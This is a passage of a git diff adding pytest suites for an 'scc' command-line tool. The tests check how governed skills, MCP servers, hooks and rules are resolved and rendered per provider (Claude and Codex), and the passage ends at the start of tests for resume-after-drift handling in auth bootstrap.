test_codex_rules_skipped_in_claude_with_diagnostic(self) -> None: + claude_r, _ = self._resolve_both() + assert "codex-rules" in claude_r.plans[0].skipped + diag_names = {d.artifact_name for d in claude_r.diagnostics} + assert "codex-rules" in diag_names + + def test_bindings_contain_only_matching_provider(self) -> None: + claude_r, codex_r = self._resolve_both() + for b in claude_r.plans[0].bindings: + assert b.provider == "claude" + for b in codex_r.plans[0].bindings: + assert b.provider == "codex" + + +# ═══════════════════════════════════════════════════════════════════════════ +# 3. Switching provider re-renders different native outputs +# ═══════════════════════════════════════════════════════════════════════════ + + +class TestSwitchProviderDifferentOutputs: + """Same plan input → different native file structures per provider.""" + + def test_skill_rendered_to_different_directories(self, workspace: Path) -> None: + """Skill binding → different base dirs (.claude/.scc-managed vs .agents).""" + org = _org( + profiles={"dev": _team("dev", bundles=("core-tools",))}, + catalog=_SHARED_CATALOG, + ) + claude_plans = resolve_render_plan(org, "dev", "claude").plans + codex_plans = resolve_render_plan(org, "dev", "codex").plans + + # Use separate workspaces to avoid file collisions + ws_claude = workspace / "claude-ws" + ws_codex = workspace / "codex-ws" + ws_claude.mkdir() + ws_codex.mkdir() + + claude_result = render_claude_artifacts(claude_plans[0], ws_claude) + codex_result = render_codex_artifacts(codex_plans[0], ws_codex) + + # Claude skills go under .claude/.scc-managed/skills/ + claude_skill_paths = [p for p in claude_result.rendered_paths if "skills" in str(p)] + # Codex skills go under .agents/skills/ + codex_skill_paths = [p for p in codex_result.rendered_paths if "skills" in str(p)] + + assert len(claude_skill_paths) > 0 + assert len(codex_skill_paths) > 0 + + for p in claude_skill_paths: + assert CLAUDE_SCC_DIR in str(p.relative_to(ws_claude)) + for p in codex_skill_paths: + assert CODEX_SKILLS_DIR in str(p.relative_to(ws_codex)) + + def test_mcp_rendered_to_different_config_surfaces(self, workspace: Path) -> None: + """MCP bindings → settings_fragment (Claude) vs mcp_fragment (Codex).""" + org = _org( + profiles={"dev": _team("dev", bundles=("core-tools",))}, + catalog=_SHARED_CATALOG, + ) + claude_plans = resolve_render_plan(org, "dev", "claude").plans + codex_plans = resolve_render_plan(org, "dev", "codex").plans + + ws_claude = workspace / "claude-ws" + ws_codex = workspace / "codex-ws" + ws_claude.mkdir() + ws_codex.mkdir() + + claude_result = render_claude_artifacts(claude_plans[0], ws_claude) + codex_result = render_codex_artifacts(codex_plans[0], ws_codex) + + # Claude: settings_fragment has mcpServers + assert "mcpServers" in claude_result.settings_fragment + claude_servers = claude_result.settings_fragment["mcpServers"] + assert "mcp/github" in claude_servers + assert "mcp/slack" in claude_servers + + # Codex: mcp_fragment has mcpServers + assert "mcpServers" in codex_result.mcp_fragment + codex_servers = codex_result.mcp_fragment["mcpServers"] + assert "mcp/github" in codex_servers + assert "mcp/slack" in codex_servers + + def test_native_hooks_rendered_only_by_claude(self, workspace: Path) -> None: + """claude-hooks native binding → only Claude renderer produces hook files.""" + org = _org( + profiles={"dev": _team("dev", bundles=("mixed-bundle",))}, + catalog=_SHARED_CATALOG, + ) + claude_plans = resolve_render_plan(org, "dev", "claude").plans + codex_plans = resolve_render_plan(org, "dev", "codex").plans + + ws_claude = workspace / "claude-ws" + ws_codex = workspace / "codex-ws" + ws_claude.mkdir() + ws_codex.mkdir() + + claude_result = render_claude_artifacts(claude_plans[0], ws_claude) + codex_result = render_codex_artifacts(codex_plans[0], ws_codex) + + # Claude should have rendered hooks (filter on relative path to avoid + # tmp_path containing test name like "hooks" in the directory) + claude_hook_paths = [ + p for p in claude_result.rendered_paths if "hooks" in str(p.relative_to(ws_claude)) + ] + assert len(claude_hook_paths) > 0 + + # Codex should NOT have rendered hooks (claude-hooks has no codex binding) + codex_hook_paths = [ + p for p in codex_result.rendered_paths if "hooks" in str(p.relative_to(ws_codex)) + ] + assert len(codex_hook_paths) == 0 + + def test_native_rules_rendered_only_by_codex(self, workspace: Path) -> None: + """codex-rules native binding → only Codex renderer produces rule files.""" + org = _org( + profiles={"dev": _team("dev", bundles=("mixed-bundle",))}, + catalog=_SHARED_CATALOG, + ) + claude_plans = resolve_render_plan(org, "dev", "claude").plans + codex_plans = resolve_render_plan(org, "dev", "codex").plans + + ws_claude = workspace / "claude-ws" + ws_codex = workspace / "codex-ws" + ws_claude.mkdir() + ws_codex.mkdir() + + claude_result = render_claude_artifacts(claude_plans[0], ws_claude) + codex_result = render_codex_artifacts(codex_plans[0], ws_codex) + + # Codex should have rendered rules (filter on relative path) + codex_rule_paths = [ + p for p in codex_result.rendered_paths if "rules" in str(p.relative_to(ws_codex)) + ] + assert len(codex_rule_paths) > 0 + + # Claude should NOT have rendered rules (codex-rules has no claude binding) + claude_rule_paths = [ + p for p in claude_result.rendered_paths if "rules" in str(p.relative_to(ws_claude)) + ] + assert len(claude_rule_paths) == 0 + + +# ═══════════════════════════════════════════════════════════════════════════ +# 4. End-to-end: NormalizedOrgConfig → resolve → render → verify files +# ═══════════════════════════════════════════════════════════════════════════ + + +class TestEndToEndPipelineClaude: + """Full pipeline for Claude: org config → file outputs on disk.""" + + def test_skill_files_written_with_correct_metadata(self, workspace: Path) -> None: + org = _org( + profiles={"dev": _team("dev", bundles=("core-tools",))}, + catalog=_SHARED_CATALOG, + ) + plans = resolve_render_plan(org, "dev", "claude").plans + result = render_claude_artifacts(plans[0], workspace) + + # Find skill metadata files + skill_files = list((workspace / CLAUDE_SCC_DIR / "skills").rglob("skill.json")) + assert len(skill_files) == 2 # review-skill, lint-skill + + for sf in skill_files: + data = json.loads(sf.read_text()) + assert data["provider"] == "claude" + assert data["bundle_id"] == "core-tools" + assert data["managed_by"] == "scc" + assert "native_ref" in data + + assert len(result.warnings) == 0 + + def test_mcp_settings_fragment_has_correct_transport(self, workspace: Path) -> None: + org = _org( + profiles={"dev": _team("dev", bundles=("core-tools",))}, + catalog=_SHARED_CATALOG, + ) + plans = resolve_render_plan(org, "dev", "claude").plans + result = render_claude_artifacts(plans[0], workspace) + + servers = result.settings_fragment["mcpServers"] + # github-mcp is SSE + assert servers["mcp/github"]["type"] == "sse" + assert servers["mcp/github"]["url"] == "http://github-mcp:8080/sse" + # slack-mcp is stdio + assert servers["mcp/slack"]["type"] == "stdio" + assert servers["mcp/slack"]["command"] == "slack-mcp-server" + + def test_settings_audit_file_written(self, workspace: Path) -> None: + org = _org( + profiles={"dev": _team("dev", bundles=("core-tools",))}, + catalog=_SHARED_CATALOG, + ) + plans = resolve_render_plan(org, "dev", "claude").plans + render_claude_artifacts(plans[0], workspace) + + audit_file = workspace / ".claude" / ".scc-settings-core-tools.json" + assert audit_file.exists() + audit_data = json.loads(audit_file.read_text()) + assert "mcpServers" in audit_data + + def test_native_hooks_file_written(self, workspace: Path) -> None: + org = _org( + profiles={"dev": _team("dev", bundles=("mixed-bundle",))}, + catalog=_SHARED_CATALOG, + ) + plans = resolve_render_plan(org, "dev", "claude").plans + render_claude_artifacts(plans[0], workspace) + + hook_files = list((workspace / CLAUDE_SCC_DIR / "hooks").rglob("*.json")) + assert len(hook_files) == 1 + data = json.loads(hook_files[0].read_text()) + assert data["managed_by"] == "scc" + assert data["source"] == "./claude/hooks.json" + + +class TestEndToEndPipelineCodex: + """Full pipeline for Codex: org config → file outputs on disk.""" + + def test_skill_files_written_with_correct_metadata(self, workspace: Path) -> None: + org = _org( + profiles={"dev": _team("dev", bundles=("core-tools",))}, + catalog=_SHARED_CATALOG, + ) + plans = resolve_render_plan(org, "dev", "codex").plans + result = render_codex_artifacts(plans[0], workspace) + + skill_files = list((workspace / CODEX_SKILLS_DIR).rglob("skill.json")) + assert len(skill_files) == 2 # review-skill, lint-skill + + for sf in skill_files: + data = json.loads(sf.read_text()) + assert data["provider"] == "codex" + assert data["bundle_id"] == "core-tools" + assert data["managed_by"] == "scc" + assert "native_ref" in data + + assert len(result.warnings) == 0 + + def test_mcp_fragment_has_correct_transport(self, workspace: Path) -> None: + org = _org( + profiles={"dev": _team("dev", bundles=("core-tools",))}, + catalog=_SHARED_CATALOG, + ) + plans = resolve_render_plan(org, "dev", "codex").plans + result = render_codex_artifacts(plans[0], workspace) + + servers = result.mcp_fragment["mcpServers"] + assert servers["mcp/github"]["type"] == "sse" + assert servers["mcp/github"]["url"] == "http://github-mcp:8080/sse" + assert servers["mcp/slack"]["type"] == "stdio" + assert servers["mcp/slack"]["command"] == "slack-mcp-server" + + def test_mcp_audit_file_written(self, workspace: Path) -> None: + org = _org( + profiles={"dev": _team("dev", bundles=("core-tools",))}, + catalog=_SHARED_CATALOG, + ) + plans = resolve_render_plan(org, "dev", "codex").plans + render_codex_artifacts(plans[0], workspace) + + audit_file = workspace / ".codex" / ".scc-mcp-core-tools.json" + assert audit_file.exists() + audit_data = json.loads(audit_file.read_text()) + assert "mcpServers" in audit_data + + def test_native_rules_file_written(self, workspace: Path) -> None: + org = _org( + profiles={"dev": _team("dev", bundles=("mixed-bundle",))}, + catalog=_SHARED_CATALOG, + ) + plans = resolve_render_plan(org, "dev", "codex").plans + render_codex_artifacts(plans[0], workspace) + + rule_files = list((workspace / ".codex" / "rules").rglob("*.rules.json")) + assert len(rule_files) == 1 + data = json.loads(rule_files[0].read_text()) + assert data["managed_by"] == "scc" + assert data["source"] == "./codex/safety.rules" + + +# ═══════════════════════════════════════════════════════════════════════════ +# 5. Backward compatibility: teams without governed_artifacts +# ═══════════════════════════════════════════════════════════════════════════ + + +class TestBackwardCompatibilityNoGovernedArtifacts: + """Teams without governed_artifacts config → empty plans, no errors.""" + + def test_team_with_no_bundles_produces_empty_result(self) -> None: + org = _org( + profiles={"legacy": _team("legacy", bundles=())}, + catalog=_SHARED_CATALOG, + ) + result = resolve_render_plan(org, "legacy", "claude") + assert result.plans == () + assert result.diagnostics == () + + def test_empty_catalog_with_no_bundles_produces_empty_result(self) -> None: + org = _org( + profiles={"legacy": _team("legacy", bundles=())}, + catalog=GovernedArtifactsCatalog(), + ) + result = resolve_render_plan(org, "legacy", "codex") + assert result.plans == () + assert result.diagnostics == () + + def test_old_marketplace_team_fields_preserved(self) -> None: + """Teams with marketplace/plugin fields but no bundles still work.""" + legacy_team = NormalizedTeamConfig( + name="legacy-team", + plugin="my-plugin", + marketplace="my-marketplace", + enabled_bundles=(), + ) + org = _org(profiles={"legacy-team": legacy_team}) + result = resolve_render_plan(org, "legacy-team", "claude") + assert result.plans == () + assert result.diagnostics == () + # The team's marketplace/plugin fields are untouched + profile = org.get_profile("legacy-team") + assert profile is not None + assert profile.plugin == "my-plugin" + assert profile.marketplace == "my-marketplace" + + def test_empty_plan_renders_to_empty_result_claude(self, workspace: Path) -> None: + """Rendering an empty plan produces no files or fragments.""" + plan = ArtifactRenderPlan(bundle_id="empty", provider="claude") + result = render_claude_artifacts(plan, workspace) + assert result.rendered_paths == () + assert result.settings_fragment == {} + assert result.warnings == () + + def test_empty_plan_renders_to_empty_result_codex(self, workspace: Path) -> None: + plan = ArtifactRenderPlan(bundle_id="empty", provider="codex") + result = render_codex_artifacts(plan, workspace) + assert result.rendered_paths == () + assert result.mcp_fragment == {} + assert result.warnings == () + + +# ═══════════════════════════════════════════════════════════════════════════ +# 6. Pipeline seam: boundary contracts between resolver and renderers +# ═══════════════════════════════════════════════════════════════════════════ + + +class TestPipelineSeamContracts: + """Verify resolver output shape matches renderer input expectations.""" + + def test_resolver_plan_provider_matches_renderer_expectation(self) -> None: + """resolve_render_plan provider arg → plan.provider → renderer accepts.""" + org = _org( + profiles={"dev": _team("dev", bundles=("core-tools",))}, + catalog=_SHARED_CATALOG, + ) + for provider in ("claude", "codex"): + result = resolve_render_plan(org, "dev", provider) + for plan in result.plans: + assert plan.provider == provider + + def test_resolver_produces_tuples_not_lists(self) -> None: + """Renderer relies on tuple immutability from resolver output.""" + org = _org( + profiles={"dev": _team("dev", bundles=("core-tools",))}, + catalog=_SHARED_CATALOG, + ) + result = resolve_render_plan(org, "dev", "claude") + assert isinstance(result.plans, tuple) + assert isinstance(result.diagnostics, tuple) + for plan in result.plans: + assert isinstance(plan.bindings, tuple) + assert isinstance(plan.skipped, tuple) + assert isinstance(plan.effective_artifacts, tuple) + + def test_wrong_provider_plan_to_renderer_produces_warning(self, workspace: Path) -> None: + """Feeding a Claude plan to the Codex renderer is a no-op with warning.""" + org = _org( + profiles={"dev": _team("dev", bundles=("core-tools",))}, + catalog=_SHARED_CATALOG, + ) + claude_result = resolve_render_plan(org, "dev", "claude") + plan = claude_result.plans[0] + + # Feed Claude plan to Codex renderer + codex_render = render_codex_artifacts(plan, workspace) + assert len(codex_render.warnings) > 0 + assert any("not 'codex'" in w for w in codex_render.warnings) + assert codex_render.rendered_paths == () + + def test_wrong_provider_plan_to_claude_renderer_produces_warning(self, workspace: Path) -> None: + """Feeding a Codex plan to the Claude renderer is a no-op with warning.""" + org = _org( + profiles={"dev": _team("dev", bundles=("core-tools",))}, + catalog=_SHARED_CATALOG, + ) + codex_result = resolve_render_plan(org, "dev", "codex") + plan = codex_result.plans[0] + + claude_render = render_claude_artifacts(plan, workspace) + assert len(claude_render.warnings) > 0 + assert any("not 'claude'" in w for w in claude_render.warnings) + assert claude_render.rendered_paths == () + + def test_bindings_have_provider_field_matching_plan(self) -> None: + """All bindings in a resolved plan have provider == plan.provider.""" + org = _org( + profiles={"dev": _team("dev", bundles=("core-tools",))}, + catalog=_SHARED_CATALOG, + ) + for provider in ("claude", "codex"): + result = resolve_render_plan(org, "dev", provider) + for plan in result.plans: + for binding in plan.bindings: + assert binding.provider == provider + + +class TestMultiBundlePipeline: + """Multiple bundles enabled for a single team.""" + + def test_multiple_bundles_produce_multiple_plans(self) -> None: + org = _org( + profiles={ + "dev": _team("dev", bundles=("core-tools", "provider-native")), + }, + catalog=_SHARED_CATALOG, + ) + result = resolve_render_plan(org, "dev", "claude") + assert len(result.plans) == 2 + assert result.plans[0].bundle_id == "core-tools" + assert result.plans[1].bundle_id == "provider-native" + + def test_multi_bundle_renders_all_files(self, workspace: Path) -> None: + """Each plan renders independently, files accumulate in workspace.""" + org = _org( + profiles={ + "dev": _team("dev", bundles=("core-tools", "provider-native")), + }, + catalog=_SHARED_CATALOG, + ) + plans = resolve_render_plan(org, "dev", "claude").plans + + all_paths: list[Path] = [] + for plan in plans: + result = render_claude_artifacts(plan, workspace) + all_paths.extend(result.rendered_paths) + + # core-tools: 2 skills + 1 settings file = 3 paths + # provider-native: 1 hooks file = 1 path + assert len(all_paths) >= 3 + + def test_multi_bundle_codex_renders_all_files(self, workspace: Path) -> None: + org = _org( + profiles={ + "dev": _team("dev", bundles=("core-tools", "provider-native")), + }, + catalog=_SHARED_CATALOG, + ) + plans = resolve_render_plan(org, "dev", "codex").plans + + all_paths: list[Path] = [] + for plan in plans: + result = render_codex_artifacts(plan, workspace) + all_paths.extend(result.rendered_paths) + + # core-tools: 2 skills + 1 mcp audit file = 3 paths + # provider-native: 1 rules file = 1 path + assert len(all_paths) >= 3 + + +class TestCrossProviderEquivalence: + """Same bundle → same effective artifacts but different file trees.""" + + def test_same_effective_artifacts_different_file_trees(self, workspace: Path) -> None: + org = _org( + profiles={"dev": _team("dev", bundles=("core-tools",))}, + catalog=_SHARED_CATALOG, + ) + claude_plans = resolve_render_plan(org, "dev", "claude").plans + codex_plans = resolve_render_plan(org, "dev", "codex").plans + + # Same effective artifacts + assert set(claude_plans[0].effective_artifacts) == set(codex_plans[0].effective_artifacts) + + ws_claude = workspace / "claude-ws" + ws_codex = workspace / "codex-ws" + ws_claude.mkdir() + ws_codex.mkdir() + + claude_result = render_claude_artifacts(claude_plans[0], ws_claude) + codex_result = render_codex_artifacts(codex_plans[0], ws_codex) + + # Both produce rendered paths, but they're different + assert len(claude_result.rendered_paths) > 0 + assert len(codex_result.rendered_paths) > 0 + + # No path overlap — different directory structures + claude_rel = {str(p.relative_to(ws_claude)) for p in claude_result.rendered_paths} + codex_rel = {str(p.relative_to(ws_codex)) for p in codex_result.rendered_paths} + assert claude_rel.isdisjoint(codex_rel), ( + f"File paths should differ between providers: overlap = {claude_rel & codex_rel}" + ) + + def test_idempotent_rendering_across_double_resolve(self, workspace: Path) -> None: + """Resolving + rendering twice produces identical file content.""" + org = _org( + profiles={"dev": _team("dev", bundles=("core-tools",))}, + catalog=_SHARED_CATALOG, + ) + + ws1 = workspace / "run1" + ws2 = workspace / "run2" + ws1.mkdir() + ws2.mkdir() + + for ws in (ws1, ws2): + plans = resolve_render_plan(org, "dev", "claude").plans + render_claude_artifacts(plans[0], ws) + + # Compare all files byte-for-byte + files1 = sorted(ws1.rglob("*"), key=lambda p: str(p.relative_to(ws1))) + files2 = sorted(ws2.rglob("*"), key=lambda p: str(p.relative_to(ws2))) + + file_rels_1 = [str(f.relative_to(ws1)) for f in files1 if f.is_file()] + file_rels_2 = [str(f.relative_to(ws2)) for f in files2 if f.is_file()] + assert file_rels_1 == file_rels_2 + + for f1, f2 in zip( + [f for f in files1 if f.is_file()], + [f for f in files2 if f.is_file()], + ): + assert f1.read_bytes() == f2.read_bytes(), f"Files differ: {f1.relative_to(ws1)}" + + +class TestMixedBundleAsymmetry: + """Mixed bundle with both shared and provider-specific artifacts.""" + + def test_mixed_bundle_claude_sees_hooks_not_rules(self, workspace: Path) -> None: + org = _org( + profiles={"dev": _team("dev", bundles=("mixed-bundle",))}, + catalog=_SHARED_CATALOG, + ) + plans = resolve_render_plan(org, "dev", "claude").plans + plan = plans[0] + + assert "review-skill" in plan.effective_artifacts + assert "github-mcp" in plan.effective_artifacts + assert "claude-hooks" in plan.effective_artifacts + assert "codex-rules" in plan.skipped + + def test_mixed_bundle_codex_sees_rules_not_hooks(self, workspace: Path) -> None: + org = _org( + profiles={"dev": _team("dev", bundles=("mixed-bundle",))}, + catalog=_SHARED_CATALOG, + ) + plans = resolve_render_plan(org, "dev", "codex").plans + plan = plans[0] + + assert "review-skill" in plan.effective_artifacts + assert "github-mcp" in plan.effective_artifacts + assert "codex-rules" in plan.effective_artifacts + assert "claude-hooks" in plan.skipped + + def test_mixed_bundle_full_render_claude(self, workspace: Path) -> None: + org = _org( + profiles={"dev": _team("dev", bundles=("mixed-bundle",))}, + catalog=_SHARED_CATALOG, + ) + plans = resolve_render_plan(org, "dev", "claude").plans + result = render_claude_artifacts(plans[0], workspace) + + # Should have: skill file + hooks file + settings audit file + assert len(result.rendered_paths) >= 2 + assert len(result.warnings) == 0 + + def test_mixed_bundle_full_render_codex(self, workspace: Path) -> None: + org = _org( + profiles={"dev": _team("dev", bundles=("mixed-bundle",))}, + catalog=_SHARED_CATALOG, + ) + plans = resolve_render_plan(org, "dev", "codex").plans + result = render_codex_artifacts(plans[0], workspace) + + # Should have: skill file + rules file + mcp audit file + assert len(result.rendered_paths) >= 2 + assert len(result.warnings) == 0 + + +class TestDisabledAndFilteredArtifacts: + """Install intent filtering propagates through the full pipeline.""" + + def test_disabled_artifact_excluded_from_both_plans(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={ + "active-skill": _skill("active-skill"), + "dead-skill": _skill("dead-skill", intent=ArtifactInstallIntent.DISABLED), + }, + bindings={ + "active-skill": ( + ProviderArtifactBinding(provider="claude", native_ref="skills/active"), + ProviderArtifactBinding(provider="codex", native_ref="skills/active"), + ), + "dead-skill": ( + ProviderArtifactBinding(provider="claude", native_ref="skills/dead"), + ProviderArtifactBinding(provider="codex", native_ref="skills/dead"), + ), + }, + bundles={ + "test-bundle": ArtifactBundle( + name="test-bundle", + artifacts=("active-skill", "dead-skill"), + ), + }, + ) + org = _org( + profiles={"dev": _team("dev", bundles=("test-bundle",))}, + catalog=catalog, + ) + + for provider in ("claude", "codex"): + result = resolve_render_plan(org, "dev", provider) + plan = result.plans[0] + assert "active-skill" in plan.effective_artifacts + assert "dead-skill" not in plan.effective_artifacts + assert "dead-skill" in plan.skipped + + def test_disabled_artifact_produces_no_files(self, workspace: Path) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={ + "dead-skill": _skill("dead-skill", intent=ArtifactInstallIntent.DISABLED), + }, + bindings={ + "dead-skill": ( + ProviderArtifactBinding(provider="claude", native_ref="skills/dead"), + ), + }, + bundles={ + "test-bundle": ArtifactBundle( + name="test-bundle", + artifacts=("dead-skill",), + ), + }, + ) + org = _org( + profiles={"dev": _team("dev", bundles=("test-bundle",))}, + catalog=catalog, + ) + plans = resolve_render_plan(org, "dev", "claude").plans + result = render_claude_artifacts(plans[0], workspace) + # No files rendered — the only artifact was disabled + assert result.rendered_paths == () + + def test_request_only_excluded_from_pipeline(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={ + "request-skill": _skill("request-skill", intent=ArtifactInstallIntent.REQUEST_ONLY), + }, + bindings={ + "request-skill": ( + ProviderArtifactBinding(provider="claude", native_ref="skills/req"), + ), + }, + bundles={ + "test-bundle": ArtifactBundle( + name="test-bundle", + artifacts=("request-skill",), + ), + }, + ) + org = _org( + profiles={"dev": _team("dev", bundles=("test-bundle",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "dev", "claude") + plan = result.plans[0] + assert "request-skill" not in plan.effective_artifacts + assert "request-skill" in plan.skipped + + +# --------------------------------------------------------------------------- +# D023: Portable artifacts without bindings — full pipeline +# --------------------------------------------------------------------------- + + +class TestPortableArtifactPipeline: + """D023: Skills and MCP servers without provider bindings render on both providers.""" + + def test_portable_skill_resolved_and_rendered_claude(self, workspace: Path) -> None: + """Skill with no binding → portable_artifacts → Claude renderer produces output.""" + catalog = GovernedArtifactsCatalog( + artifacts={ + "portable-skill": GovernedArtifact( + kind=ArtifactKind.SKILL, + name="portable-skill", + install_intent=ArtifactInstallIntent.REQUIRED, + source_type="git", + source_url="https://example.com/skill.git", + source_ref="v1.0", + version="1.0", + ), + }, + bindings={}, # no bindings at all + bundles={ + "dev-bundle": ArtifactBundle(name="dev-bundle", artifacts=("portable-skill",)), + }, + ) + org = _org( + profiles={"dev": _team("dev", bundles=("dev-bundle",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "dev", "claude") + plan = result.plans[0] + assert "portable-skill" in plan.effective_artifacts + assert len(plan.portable_artifacts) == 1 + assert plan.portable_artifacts[0].name == "portable-skill" + assert plan.portable_artifacts[0].source_url == "https://example.com/skill.git" + + render_result = render_claude_artifacts(plan, workspace) + assert len(render_result.rendered_paths) == 1 + skill_path = workspace / CLAUDE_SCC_DIR / "skills" / "portable-skill" / "skill.json" + assert skill_path.exists() + data = json.loads(skill_path.read_text()) + assert data["portable"] is True + assert data["source_url"] == "https://example.com/skill.git" + + def test_portable_skill_resolved_and_rendered_codex(self, workspace: Path) -> None: + """Skill with no binding → portable_artifacts → Codex renderer produces output.""" + catalog = GovernedArtifactsCatalog( + artifacts={ + "portable-skill": GovernedArtifact( + kind=ArtifactKind.SKILL, + name="portable-skill", + install_intent=ArtifactInstallIntent.REQUIRED, + source_type="git", + source_url="https://example.com/skill.git", + source_ref="v1.0", + ), + }, + bindings={}, + bundles={ + "dev-bundle": ArtifactBundle(name="dev-bundle", artifacts=("portable-skill",)), + }, + ) + org = _org( + profiles={"dev": _team("dev", bundles=("dev-bundle",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "dev", "codex") + plan = result.plans[0] + assert len(plan.portable_artifacts) == 1 + + render_result = render_codex_artifacts(plan, workspace) + assert len(render_result.rendered_paths) == 1 + skill_path = workspace / CODEX_SKILLS_DIR / "portable-skill" / "skill.json" + assert skill_path.exists() + data = json.loads(skill_path.read_text()) + assert data["portable"] is True + assert data["provider"] == "codex" + + def test_portable_mcp_resolved_and_rendered_both_providers(self, workspace: Path) -> None: + """MCP server with no binding → portable rendering on both providers.""" + catalog = GovernedArtifactsCatalog( + artifacts={ + "shared-mcp": GovernedArtifact( + kind=ArtifactKind.MCP_SERVER, + name="shared-mcp", + install_intent=ArtifactInstallIntent.REQUIRED, + source_url="https://mcp.example.com/shared", + ), + }, + bindings={}, + bundles={ + "mcp-bundle": ArtifactBundle(name="mcp-bundle", artifacts=("shared-mcp",)), + }, + ) + org = _org( + profiles={"dev": _team("dev", bundles=("mcp-bundle",))}, + catalog=catalog, + ) + + # Claude + claude_plan = resolve_render_plan(org, "dev", "claude").plans[0] + assert len(claude_plan.portable_artifacts) == 1 + claude_ws = workspace / "claude" + claude_ws.mkdir() + claude_result = render_claude_artifacts(claude_plan, claude_ws) + assert "mcpServers" in claude_result.settings_fragment + assert "shared-mcp" in claude_result.settings_fragment["mcpServers"] + + # Codex + codex_plan = resolve_render_plan(org, "dev", "codex").plans[0] + assert len(codex_plan.portable_artifacts) == 1 + codex_ws = workspace / "codex" + codex_ws.mkdir() + codex_result = render_codex_artifacts(codex_plan, codex_ws) + assert "mcpServers" in codex_result.mcp_fragment + assert "shared-mcp" in codex_result.mcp_fragment["mcpServers"] + + def test_mixed_bound_and_portable_in_same_bundle(self, workspace: Path) -> None: + """Bundle with bound + portable artifacts → both render.""" + catalog = GovernedArtifactsCatalog( + artifacts={ + "bound-skill": GovernedArtifact( + kind=ArtifactKind.SKILL, + name="bound-skill", + install_intent=ArtifactInstallIntent.REQUIRED, + ), + "portable-skill": GovernedArtifact( + kind=ArtifactKind.SKILL, + name="portable-skill", + install_intent=ArtifactInstallIntent.REQUIRED, + source_type="git", + source_url="https://example.com/portable.git", + ), + }, + bindings={ + "bound-skill": ( + ProviderArtifactBinding(provider="claude", native_ref="skills/bound"), + ), + # portable-skill has NO binding + }, + bundles={ + "mixed": ArtifactBundle(name="mixed", artifacts=("bound-skill", "portable-skill")), + }, + ) + org = _org( + profiles={"dev": _team("dev", bundles=("mixed",))}, + catalog=catalog, + ) + plan = resolve_render_plan(org, "dev", "claude").plans[0] + assert "bound-skill" in plan.effective_artifacts + assert "portable-skill" in plan.effective_artifacts + assert len(plan.bindings) == 1 # only bound-skill has a binding + assert len(plan.portable_artifacts) == 1 # portable-skill + + result = render_claude_artifacts(plan, workspace) + # Both should produce output + assert len(result.rendered_paths) == 2 + paths_str = [str(p) for p in result.rendered_paths] + assert any("bound" in p for p in paths_str) + assert any("portable" in p for p in paths_str) + + def test_native_integration_still_requires_binding(self) -> None: + """Native integration without binding is skipped (not portable).""" + catalog = GovernedArtifactsCatalog( + artifacts={ + "hooks-native": GovernedArtifact( + kind=ArtifactKind.NATIVE_INTEGRATION, + name="hooks-native", + install_intent=ArtifactInstallIntent.REQUIRED, + ), + }, + bindings={}, + bundles={ + "native-only": ArtifactBundle(name="native-only", artifacts=("hooks-native",)), + }, + ) + org = _org( + profiles={"dev": _team("dev", bundles=("native-only",))}, + catalog=catalog, + ) + plan = resolve_render_plan(org, "dev", "claude").plans[0] + assert "hooks-native" not in plan.effective_artifacts + assert "hooks-native" in plan.skipped + assert len(plan.portable_artifacts) == 0 diff --git a/tests/test_resume_after_drift.py b/tests/test_resume_after_drift.py new file mode 100644 index 0000000..5538831 --- /dev/null +++ b/tests/test_resume_after_drift.py @@ -0,0 +1,602 @@ +"""Tests for resume-after-drift edge cases and auth bootstrap failure handling. + +Verifies: +- Codex session resume when auth volume deleted → auth bootstrap triggers +- Codex session resume when image removed → image auto-build triggers +- Explicit --provider overrides resume provider +- Session provider no longer in allowed_providers → ProviderNotAllowedError +- Legacy session with provider_id=None → falls back to claude (D032) +- Explicit --provider codex with missing auth in non-interactive → typed error +- Auth bootstrap callback failure → clean ProviderNotReadyError wrapping +""" + +from __future__ import annotations + +import subprocess +from unittest.mock import MagicMock, patch + +import pytest + +from scc_cli.commands.launch.auth_bootstrap import ensure_provider_auth +from scc_cli.commands.launch.preflight import ( + AuthStatus, + ImageStatus, + LaunchReadiness, + ProviderResolutionSource, + _ensure_auth, + collect_launch_readiness, + ensure_launch_ready, + resolve_launch_provider, +) +from scc_cli.core.contracts import AuthReadiness, ProviderCapabilityProfile +from scc_cli.core.errors import ProviderNotAllowedError, ProviderNotReadyError + +# ────────────────────────────────────────────────────────────────────────────── +# Helpers +# ────────────────────────────────────────────────────────────────────────────── + + +def _mock_adapters( + *, + connected_providers: tuple[str, ...] = ("claude", "codex"), +) -> MagicMock: + """Build mock adapters that work with get_agent_provider dispatch. + + get_agent_provider looks up field names from _PROVIDER_DISPATCH: + claude → adapters.agent_provider + codex → adapters.codex_agent_provider + """ + adapters = MagicMock() + + def _make_provider(pid: str) -> MagicMock: + provider = MagicMock() + status = "present" if pid in connected_providers else "missing" + provider.auth_check.return_value = AuthReadiness( + status=status, + mechanism="test", + guidance=f"{pid} auth cache {status}", + ) + provider.capability_profile.return_value = ProviderCapabilityProfile( + provider_id=pid, + display_name=pid.title(), + required_destination_set=f"{pid}-core", + supports_resume=False, + supports_skills=True, + supports_native_integrations=True, + ) + return provider + + adapters.agent_provider = _make_provider("claude") + adapters.codex_agent_provider = _make_provider("codex") + return adapters + + +def _make_codex_provider_mock( + *, + auth_status: str = "present", + bootstrap_raises: Exception | None = None, +) -> MagicMock: + """Build a mock Codex provider adapter.""" + provider = MagicMock() + provider.capability_profile.return_value = ProviderCapabilityProfile( + provider_id="codex", + display_name="Codex", + required_destination_set="openai-core", + supports_resume=False, + supports_skills=True, + supports_native_integrations=True, + ) + provider.auth_check.return_value = AuthReadiness( + status=auth_status, + mechanism="auth_json_file", + guidance="test", + ) + if bootstrap_raises: + provider.bootstrap_auth.side_effect = bootstrap_raises + return provider + + +def _mock_org_with_allowed(allowed: tuple[str, ...]) -> MagicMock: + """Build a mock NormalizedOrgConfig with a team that allows specific providers.""" + org = MagicMock() + profile = MagicMock() + profile.allowed_providers = allowed + org.get_profile.return_value = profile + return org + + +# ────────────────────────────────────────────────────────────────────────────── +# 1. Resume with deleted auth volume → provider stays codex, auth bootstrap needed +# ────────────────────────────────────────────────────────────────────────────── + + +class TestResumeWithDeletedAuthVolume: + """When a Codex session is resumed but auth was deleted, SCC should + trigger auth bootstrap for Codex — not silently switch to Claude.""" + + def 